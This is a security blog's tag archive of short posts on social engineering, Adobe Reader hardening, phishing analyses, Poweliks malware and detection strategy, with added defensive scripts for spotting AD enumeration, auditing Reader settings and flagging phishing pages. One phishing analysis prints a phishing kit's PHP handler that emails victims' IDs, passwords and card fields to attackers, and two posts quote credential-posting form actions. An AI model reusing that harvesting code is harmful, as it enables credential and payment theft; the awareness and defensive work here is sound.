Tag Archives: Targeted Attacks

The technology dimension of social engineering

7 February 2015

In his post ‘Weird Security Term of the Week: “Social Engineering”’ Kurt Ellzey talks of ‘Social Engineering’ as the ‘Art of Getting Information’ about a person.

A short query on Google reveals a multitude of information that could be used to create a rough profile of a person. A malicious insider could easily enhance this profile by personal information gathered from e.g. a company intranet or SharePoint MySites.

Besides this ‘personal information’ a rich set of easy-to-extract ‘technical information’ about an employee is available from a company network.

A Windows workstation is a universal machine. It can be used to run an application as well as to administer a server or network. For example, the built-in ‘net’ command could be used to retrieve detailed employee account data from the Active Directory.

Some colors to fight the winter depression.

IAM (Identity and Access Management) systems, very often deployed as self-services to improve user satisfaction, could be used to get detailed information about the applications used by employees to get their job done.

But the worst is that these information sources are available to all employees, irrespective of whether they are needed for the job. This is a massive violation of the Principle of Least Privilege.

Attackers can read company networks like an open book.

And, when enriched with technical information, a personal profile becomes an invaluable information source for targeted attacks.

Just some suggestions on how to tackle these problems.

As a general design principle I would strongly recommend enforcing the principle of least privilege for all information systems. Software restriction policies could be used to deny standard users access to administrative commands. IAM systems should offer only user-related information on a user’s request.

I dream of an operating system which provides only those commands and applications which are essential for a user’s job. This could reduce the attack surface of a company dramatically.
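Until such an operating system exists, the gap can at least be made visible: the following added example (not part of the original post) scans flattened process-creation events for the ‘net’ command querying domain account data from accounts whose job does not require it. The log format, the sample lines and the allowlist of admin accounts are constructed for this example.

```python
"""Spot Active Directory account enumeration with the built-in 'net' command
in workstation process-creation events, so that least-privilege gaps show up
in the SOC instead of in an attacker's profile. Added example, not part of
the original post; log format, sample lines and allowlist are constructed."""
import re
from collections import Counter

# Accounts whose job includes running 'net' against the domain (assumed).
ADMIN_ACCOUNTS = {"svc_helpdesk", "admin.mueller"}
# 'net' sub-commands that query account or group data.
ENUM_VERBS = {"user", "group", "localgroup", "accounts"}
LINE_RE = re.compile(r'user=(?P<user>\S+) host=(?P<host>\S+) image=(?P<image>.+?) cmd="(?P<cmd>[^"]*)"')

# Constructed sample of flattened process-creation events (one per line).
SAMPLE_LOG = """\
user=jdoe host=WS017 image=C:\\Windows\\System32\\net.exe cmd="net user jdoe /domain"
user=jdoe host=WS017 image=C:\\Windows\\System32\\net1.exe cmd="C:\\Windows\\system32\\net1 user jdoe /domain"
user=jdoe host=WS017 image=C:\\Windows\\System32\\net.exe cmd="net group /domain"
user=svc_helpdesk host=ADM02 image=C:\\Windows\\System32\\net.exe cmd="net user m.schmidt /domain"
user=asmith host=WS042 image=C:\\Windows\\System32\\net.exe cmd="net use Z: \\\\fileserver\\share"
user=jdoe host=WS017 image=C:\\Program Files\\App\\app.exe cmd="app.exe --sync"
"""


def is_domain_enumeration(image, cmd):
    """True when net.exe/net1.exe queries account or group data from the domain."""
    if image.lower().rsplit("\\", 1)[-1] not in ("net.exe", "net1.exe"):
        return False
    words = cmd.lower().split()
    # words[0] is the program itself; the sub-command follows it
    return any(w in ENUM_VERBS for w in words[1:2]) and "/domain" in words


def find_enumeration(log, allowlist=ADMIN_ACCOUNTS):
    """Return {(user, host): number of enumeration commands} for accounts
    that are not on the allowlist."""
    hits = Counter()
    for line in log.splitlines():
        m = LINE_RE.search(line)
        if not m or m["user"] in allowlist:
            continue
        if is_domain_enumeration(m["image"], m["cmd"]):
            hits[(m["user"], m["host"])] += 1
    return dict(hits)
```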

Have a nice weekend!

Software manufacturers have no sense for IT security – Part II

23 October 2014

Sometimes malware protection software works too well. I found some emails with malicious executables, disguised as pdf files, in the attachment in my junk-mail folder. Unfortunately the anti-malware system removed the attachments and replaced them with the filename.

Some weeks ago a new kind of malware that resides solely in the registry was in the news. To implant Poweliks, attackers must exploit a vulnerability of the system and the good faith of the users. Pdf or rtf documents with embedded malicious code are very often used to start the attack.

Just why is the Adobe Reader such a popular tool for attackers?

Adobe Reader is very popular for viewing pdf documents, and very notorious for its vulnerabilities. The list of known vulnerabilities published in the National Vulnerability Database is really long, and some of them are perfectly suited to implant malware. By the way, Adobe Flash Player is as popular with attackers as the Adobe Reader, and its list of vulnerabilities is of comparable size.

Fortunately advanced security options like a sandbox are available to defend against malicious attacks, but they are not activated during a standard installation. Even for enterprise users the standard installation package must be pre-configured.

I can’t find a reason why Adobe does not install the Reader with advanced security options enabled by default. Apparently, Adobe is not interested in protecting the privacy and security of their customers.

Fortunately the National Checklist Program Repository provides ‘detailed low level guidance on setting the security configuration of operating systems and applications’.

For Acrobat Reader X a checklist is available which could easily be adapted to Acrobat Reader XI. Although this checklist is meant for pre-configuring installation packages, the configuration hints could be used to secure existing installations as well:

Navigate to menu Edit/Preferences.

In category General section Application Startup activate option Use only certified plug-ins.

In category Security (Enhanced) set the protection options as described below:

Adobe ReaderEnhanced Security Settings

[1] Enable sandboxing for all files

[2] Enable Enhanced Security

[3] Disable all Privileged Locations.

Although this sounds somewhat paranoid, viewing pdf files is much more secure now. A pdf file is opened in a sandbox running at the lowest integrity level. Most features are disabled by default, but can be enabled with just one click.

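Settings made through the Preferences dialog are stored in the per-user registry, so checklist items [1] to [3] can be verified on existing installations without clicking through every workstation. The following added example (not the post’s, the checklist’s or Adobe’s own code) reads the Reader XI values and reports each item; it assumes the value names from Adobe’s Reader XI preference reference, so confirm them against the installed version.

```python
"""Audit the Reader XI registry values behind checklist items [1]-[3].
Added example, not from the post, the NCP checklist or Adobe. Value names
follow Adobe's Reader XI preference reference (assumption: your version matches)."""

READER_KEY = r"Software\Adobe\Acrobat Reader\11.0"
# (subkey under READER_KEY, value name, expected DWORD, checklist item)
EXPECTED = [
    ("Privileged", "bProtectedMode", 1, "[1] Protected Mode sandbox"),
    ("TrustManager", "iProtectedView", 2, "[1] Protected View for all files"),
    ("TrustManager", "bEnhancedSecurityStandalone", 1, "[2] Enhanced Security"),
    ("TrustManager", "bEnhancedSecurityInBrowser", 1, "[2] Enhanced Security in browser"),
]
# Subkeys that store Privileged Locations; item [3] wants them empty.
LOCATION_KEYS = (r"TrustManager\cTrustedFolders", r"TrustManager\cTrustedSites")


def evaluate(values, locations):
    """values: {(subkey, name): int or None}; locations: {subkey: [entries]}.
    Returns one (item, status, detail) per check. MISSING means the value is
    not set, so whatever Reader's built-in default is applies."""
    findings = []
    for subkey, name, want, item in EXPECTED:
        got = values.get((subkey, name))
        status = "OK" if got == want else ("MISSING" if got is None else "FAIL")
        findings.append((item, status, f"{subkey}\\{name} = {got}"))
    for subkey in LOCATION_KEYS:
        count = len(locations.get(subkey, []))
        findings.append(("[3] no Privileged Locations", "OK" if count == 0 else "FAIL",
                         f"{subkey}: {count} entries"))
    return findings


def read_registry():
    """Collect the live HKCU values with winreg (Windows only)."""
    import winreg
    values, locations = {}, {}
    for subkey, name, _, _ in EXPECTED:
        try:
            with winreg.OpenKey(winreg.HKEY_CURRENT_USER, f"{READER_KEY}\\{subkey}") as key:
                values[(subkey, name)] = winreg.QueryValueEx(key, name)[0]
        except OSError:
            values[(subkey, name)] = None
    for subkey in LOCATION_KEYS:
        try:
            with winreg.OpenKey(winreg.HKEY_CURRENT_USER, f"{READER_KEY}\\{subkey}") as key:
                n_keys, n_values, _ = winreg.QueryInfoKey(key)
                locations[subkey] = ([winreg.EnumKey(key, i) for i in range(n_keys)]
                                     + [winreg.EnumValue(key, i)[0] for i in range(n_values)])
        except OSError:
            locations[subkey] = []  # key absent: no locations configured
    return values, locations
```

On a Windows workstation, `evaluate(*read_registry())` yields the report; any FAIL or MISSING line names the dialog setting that still has to be changed.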
Inside a phishing attack

25 September 2014

I was phished again some days ago. This time I received a well made phishing mail with a request for verifying my Apple account details:

Phishing Mail Browser View

This was a targeted attack because the email was directly sent to my Hotmail account. When viewed on the iPad the email looks like an official email from Apple.

But viewed in Outlook the sender’s address

Apple . <apple__itunes@outlook.com>

made it clear: This was a phishing attack. Apple would never send such a mail from an outlook.com account.

Fortunately, the attackers provided a copy of the phishing scripts for download from their web service. This offered me the wonderful opportunity to analyze a phishing attempt in detail.

All links in the email point to the same internet address, a server in France, that was compromised by the attackers to cover their tracks. They installed a small script ‘apple.php’ which was used for forwarding to the malicious site. The malicious site is hosted by a provider in Vancouver, Canada.

Phishing Site Login Form

This is a really well crafted site in Apple style. But two errors in the address line

[1] http://[2]app-secure-restore.lideresrd.com/APP/ACCOU/RESET/

immediately catch the eye:

[1] Apple would never use the insecure http protocol for access to a site where users have to enter their credentials. The standard for such applications is the https protocol.

In my opinion the protocol is the best indicator for identifying a phishing attempt.

As a rule of thumb, the usage of protocol http for user authentication means: You are under attack!

[2] Apple would never use a web service outside the Apple company web for user data verification.

Since we have identified this site as malicious, we enter some rubbish and press Continue for the next page. When Continue is pressed the HTML form

<form method="post" action="RESTORE/">

is submitted and the sub page RESTORE at
http://app-secure-restore.lideresrd.com/APP/ACCOU/RESET/RESTORE/ is displayed:

Account Verifiacation Details

Page RESTORE is created at runtime by a PHP script. If you press Verify my Information the script is executed again. This time it emails the data you entered to the attackers [1] and runs the script finish.php [2], which forwards you to the Apple store.

$from_name    = '&iacute;Τunes';
$from_email   = 'localhost';
$to_email     = '<Attackers email addresses>';
$subject      = 'New UK &iacute;Τunes  | '.$_POST['A13'].' ';
$url_redirect = 'finish.php';   // [2] forwarding target after the data has been sent
if(isset($_POST) AND !empty($_POST) AND isset($_POST['A9'])){
  $mail = new mail();
  $mail->emailto   = $to_email;
  $mail->namefrom  = $from_name;
  $mail->emailfrom = $from_email;
  $mail->subject   = $subject;
  $mail->message   = '';
  $mail->message  .= 'CoT : '.$_POST['A5'].'
';  // payys
  $mail->message  .= 'I : '.$_POST['donnee1'].'
';  // Id
  $mail->message  .= 'P : '.$_POST['donnee2'].'
';  // Pass
  // .... more code
  $mail->message  .= 'DRL  : '.$_POST['A13'].'
';  // Sortt
  $mail->message  .= 'CP : '.$_POST['A14'].'
';  // Carpas
  $mail->check     = $_POST['is_valid_email'];
  $mail->send();   // [1] the entered data is mailed to the attackers here

That was a really long journey from Germany via France and Canada to Cupertino.

Take care!

I am phished!

11 September 2014

During my vacation I got some well made phishing mails. Since an iPad is not the best device for analyzing phishing mails I filed them for further processing at home.

Hotmail Phishing Mail

It is obvious that this is a phishing email:

  1. The Hotmail Team would never use an email address like someone@fastmail.fm to communicate with customers.
  2. The support team would never notify 113 recipients with a single mail due to privacy reasons.

Normally I drop such mails immediately but sometimes I do some further analysis to keep awareness high.

Thus I clicked the URL and got a very puzzling dialog box in Internet Explorer:

Verify Your Account Dialog

This dialog tells us that phishing will start soon! By now, it should be clear that something is wrong because Outlook will never display a message like this.

Finally, a faked Outlook login page is displayed:

Outlook Login Phishing Site

Again, it is obvious that this really well-made page is a fake:

  1. The site address is not Outlook.com.
  2. Site access is not secured. The http protocol is used instead of the https protocol.
  3. A Validate button is displayed instead of a Sign in button.

It is this Validate button that sends your login credentials to the phishing site:

<form name="f1" action="http://johnbomb.altervista.org/fi.php" method="POST" novalidate …

For more details activate menu ‘Developer Tools’ or hit ‘F12’ and use the Inspect function from the context menu.

What do we learn from this?

Phishing mails and sites are easy to recognize. Just be aware of the danger!
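The indicators used by eye in this post and in ‘Inside a phishing attack’ (plain http, a host outside the brand’s domain, a sender address from a foreign mail service, a form posting elsewhere) can be checked mechanically. The following added example is not part of either post; the lists of legitimate brand domains are assumptions constructed for it.

```python
"""Mechanise the checks the posts above apply by eye: is the login page
served over https, is its host inside the brand's own domain, does the
sender belong to the brand, and where does the form post the credentials.
Added example, not part of the posts; brand domain lists are assumptions."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed legitimate domains per brand (constructed for this example).
BRAND_DOMAINS = {
    "apple": {"apple.com", "icloud.com"},
    "outlook": {"outlook.com", "live.com", "hotmail.com", "microsoft.com"},
}


def _in_domain(host, domains):
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


class _FormActions(HTMLParser):
    """Collect the action attribute of every <form> in an HTML fragment."""
    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")


def phishing_indicators(brand, page_url, sender, html=""):
    """Return the indicators that mark a login page as not the brand's own."""
    domains = BRAND_DOMAINS[brand]
    page = urlsplit(page_url)
    hits = []
    if page.scheme != "https":
        hits.append("credentials requested over plain http")
    if not _in_domain(page.hostname, domains):
        hits.append(f"host {page.hostname} is outside {brand}'s domains")
    sender_domain = sender.rsplit("@", 1)[-1]
    if not _in_domain(sender_domain, domains):
        hits.append(f"sender domain {sender_domain} is not {brand}'s")
    parser = _FormActions()
    parser.feed(html)
    for action in parser.actions:
        target = urlsplit(action)
        host = target.hostname or page.hostname  # relative action stays on the page host
        if target.scheme == "http" or not _in_domain(host, domains):
            hits.append(f"form posts credentials to {action or page.hostname}")
    return hits
```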

Review – US nuclear regulator hacked several times over three years

24 August 2014

In his post ‘US nuclear regulator hacked several times over three years’ from 19 August 2014, Warwick Ashford talks about attacks on the U.S. Nuclear Regulatory Commission (NRC).

The big question is: What makes the NRC so interesting for attackers? Reports of safety audits containing information that should not be made public? I really doubt it.

In Exclusive: Nuke Regulator Hacked by Suspected Foreign Powers you get an idea about the real reasons:

‘Federal systems are constantly probed by hackers, but those intrusions are not always successful.’

Thank goodness this is absolutely correct! In nuclear power plants very old IT technology is used that cannot be attacked easily. But the detailed description of vulnerabilities found in audit reports will make successful attacks more likely.

Perhaps you remember the film ‘War Games’? Although the Maximum Credible Accident in a nuclear power plant is not comparable to a nuclear world war, the impact on health and environment is catastrophic. Therefore such events must be taken extremely seriously.

By the way, the statement above talks about the known attacks on federal systems. The total number of successful attacks may be much higher …

Don’t Panic!

Review – ‘Poweliks’ malware variant employs new antivirus evasion techniques

9 August 2014

On 4 August 2014 Brandan Blevins talks in his post ‘‘Poweliks’ malware variant employs new antivirus evasion techniques’ about a new malware that uses new infection routes.

My first thought was: Oh no, not another new malware that cannot be detected by state-of-the-art anti-virus systems!

My second thought was: Hold on for a moment. The Poweliks malware appears to jump into our computers like a deus ex machina! Sounds like magic, doesn’t it?

If you dig somewhat deeper, you find that, to implant the malware, attackers must exploit a vulnerability of the system and the good faith of the users. In this case the medium was a Word attachment to an email and a flaw in MSCOMCTL.OCX described in CVE-2012-0158.

In section ‘What might an attacker use the vulnerability to do?’ Microsoft describes the impact:

Bacteriophage P2. Source: Mostafa Fatehi

‘An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights…’.

And this is exactly what the Poweliks malware does.

What countermeasures could we take?

(a) Do not open attachments and files from untrusted sources like email. Common sense can prevent lots of malware attacks.

(b) Do not work with permanent administrative rights.

(c) Change the User Account Control (UAC) settings to the highest level ‘Always notify’. The malware installs PowerShell if it is not already installed; in this case UAC will notify you.

(d) Check whether the latest updates and patches are installed. CVE-2012-0158 was fixed in 2012 and cannot be used for an attack if Windows Update is configured to install updates automatically.

(e) Review the Trust Center Settings in Microsoft Office.

Activate ‘Disable all macros with notification’ in section ‘Macro Settings’,

Activate ‘Prompt me before enabling all controls with minimal restrictions’ in section ‘ActiveX Settings’.

Activate ‘File Block Settings’ except for Office 2007 or later formats in section ‘File Block Settings’.

(f) Check your AV provider’s homepage for the latest updates or utilities. I bet you will find some information or tool which could support you in an emergency.

(g) Don’t Panic!

Have a good Weekend

SearchSecurity – On prevention vs. detection, Gartner says to rebalance purchasing

28 June 2014

On prevention vs. detection, Gartner says to rebalance purchasing.

In this post Eric B. Parizo, Executive Editor for TechTarget’s Security Media Group, makes clear that the effectiveness of traditional, signature-based protective technologies like intrusion detection and prevention or antimalware will significantly decrease in future.

Gartner’s Adaptive Security Architecture (ASA) is a new approach for defense against targeted attacks. ASA is a reactive defense strategy based on continuous monitoring and analytics, and should be complemented by traditional, signature-based proactive technologies.

This ASA approach has one small(?) weakness: in the time between an attack, its first recognition and the implementation of protection measures we are left defenseless! This time should be kept as short as possible to prevent greater damage.

In my opinion, there is a third, recommendable way: Micro-Virtualization

Micro-Virtualization is a new approach for defense against attacks, not only targeted ones, that irons out the weaknesses of the ASA approach. An e-mail client or an internet browser session is completely isolated from other tasks and from the operating system. Only the data required for successful execution of the task (need-to-know principle) is loaded into the isolation container.

In the case of an attack only the data inside the isolation container is affected and on session end the malicious code is destroyed with the isolation container. This feature makes Micro-Virtualization a perfect complement for ASA and the traditional signature-based approach.

For more details about Micro-Virtualization please see www.bromium.com.